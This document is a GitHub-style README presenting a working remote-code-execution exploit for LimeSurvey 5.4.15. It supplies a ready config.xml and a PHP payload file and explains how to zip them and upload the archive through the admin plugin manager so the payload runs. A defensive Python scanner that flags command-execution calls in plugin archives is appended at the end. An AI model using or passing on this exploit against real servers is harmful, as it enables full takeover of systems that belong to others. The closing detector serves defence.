Sakura-501/LimeSurvey-5.4.15-PluginUploadtoRCE

LimeSurvey-5.4.15-PluginUploadtoRCE

LimeSurvey 5.4.15 has a vulnerability in index.php/admin/pluginmanager that can lead to remote code execution (RCE).

Impact: Complete control of the system.

The directory structure of the files we need is as follows:

image

Here are the attack steps:

  1. Create a config.xml as follows, and note the plugin name (exp):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>exp</name>
        <type>plugin</type>
        <creationDate>2021-11-18</creationDate>
        <lastUpdate>2021-11-23</lastUpdate>
        <author>Denis Chenu (for Respondage)</author>
        <authorUrl>https://www.respondage.nl</authorUrl>
        <supportUrl>https://www.limesurvey.org</supportUrl>
        <version>0.2.1</version>
        <license>GNU General Public License version 3 or later</license>
        <description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description>
    </metadata>

    <compatibility>
        <version>5.0</version>
    </compatibility>

    <updaters disabled="disabled">
    </updaters>
</config>
```
  2. Create a PHP file named after the plugin (exp.php) and put your payload in it, as in the following example:

```php
<?php
system('calc');
?>
```
  3. Compress config.xml and exp.php into a single archive, such as exp.zip:

  4. Upload exp.zip at /index.php/admin/pluginmanager?sa=index:

image

  5. Finally, when you click the uploaded plugin, the PHP payload is triggered:

image

image
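For reviewing a plugin archive before it is installed, the following added example (not part of the original repository) inspects a ZIP with the config.xml plus name.php layout described above and reports PHP files that call command-execution functions. The function names, the list of PHP functions and the per-file size cap are assumptions of this example, and the sample archive is constructed in memory.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# PHP functions that run OS commands; a plugin calling them needs manual review.
EXEC_CALL = re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
MAX_BYTES = 1_000_000  # per-file read cap (assumed value) against oversized entries

def _read(zf, info):
    with zf.open(info) as fh:
        return fh.read(MAX_BYTES)

def triage_plugin_zip(data):
    """Return (plugin_name, findings) for the raw bytes of a plugin ZIP."""
    findings, name = [], None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
        by_base = {i.filename.rsplit("/", 1)[-1].lower(): i for i in infos}
        cfg = by_base.get("config.xml")
        if cfg is None:
            findings.append("no config.xml in archive")
        else:
            raw = _read(zf, cfg)
            # Refuse DTDs so untrusted XML cannot trigger entity expansion.
            if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
                findings.append("config.xml declares a DTD or entities; not parsed")
            else:
                try:
                    name = ET.fromstring(raw).findtext("metadata/name")
                except ET.ParseError:
                    findings.append("config.xml is not well-formed")
        if name and f"{name}.php".lower() in by_base:
            findings.append(f"{name}.php is named after <name> in config.xml")
        for info in infos:
            if info.filename.lower().endswith((".php", ".phtml", ".phar")):
                for m in EXEC_CALL.finditer(_read(zf, info)):
                    findings.append(f"{info.filename}: calls {m.group(1).decode()}()")
    return name, findings

def build_sample():
    """Constructed sample mirroring the two-file layout from the steps above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.xml", "<config><metadata><name>exp</name></metadata></config>")
        zf.writestr("exp.php", "<?php\nsystem('calc');\n?>")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_plugin_zip(build_sample()))
```

A clean result only means none of the listed calls appear literally; any PHP file in a plugin archive still runs with the web application's privileges once the plugin is loaded.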
